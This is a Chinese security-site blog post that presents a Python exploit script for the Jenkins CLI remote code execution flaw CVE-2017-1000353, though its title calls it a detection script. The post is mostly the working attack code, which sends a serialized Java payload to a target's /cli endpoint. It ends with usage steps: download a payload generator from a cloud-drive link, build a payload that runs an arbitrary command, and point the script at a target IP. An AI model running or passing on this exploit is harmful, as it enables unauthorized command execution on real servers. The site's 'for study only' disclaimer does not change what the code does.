Jenkins远程代码执行漏洞检测脚本(CVE-2017-1000353)

  • 内容
  • 相关
# -*- coding: utf-8 -*-
import urllib
import requests
import uuid
import threading
import time
import gzip
import urllib3
import zlib
proxies = {
#  'http': 'http://127.0.0.1:8090',
#  'https': 'http://127.0.0.1:8090',
}
URL='http://目标IP:8080/cli'
PREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
PROTO = 'x00x00x00x00'
FILE_SER = open("jenkins_poc1.ser", "rb").read()
def download(url, session):
    headers = {'Side' : 'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
    print r.text
def upload(url, session, data):
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    r = requests.post(url,data=data,headers=headers,proxies=proxies)
def upload_chunked(url,session, data):
    headers = {'Side' : 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding']= None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
def null_payload():
    yield " "
def create_payload():
    payload = PREAMLE + PROTO + FILE_SER
    return payload
def create_payload_chunked():
    yield PREAMLE
    yield PROTO
    yield FILE_SER
def main():
    print "start"
    session = str(uuid.uuid4())
    t = threading.Thread(target=download, args=(URL, session))
    t.start()
    time.sleep(1)
    print "pwn"
    #upload(URL, session, create_payload())
    upload_chunked(URL, session, "asdf")
if __name__ == "__main__":

main()

 使用方法:
1、下载payload  链接: http://pan.baidu.com/s/1pLFKTYz 密码: j74r

2、生成payload

java  -jar  jenkins_payload.jar  jenkins_poc1.ser 
 "你要执行的命令"
3、修改脚本中第14行 URL=’http://目标IP:8080/cli’ 然后运行

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:Jenkins远程代码执行漏洞检测脚本(CVE-2017-1000353) - https://www.0dayhack.com/post-744.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注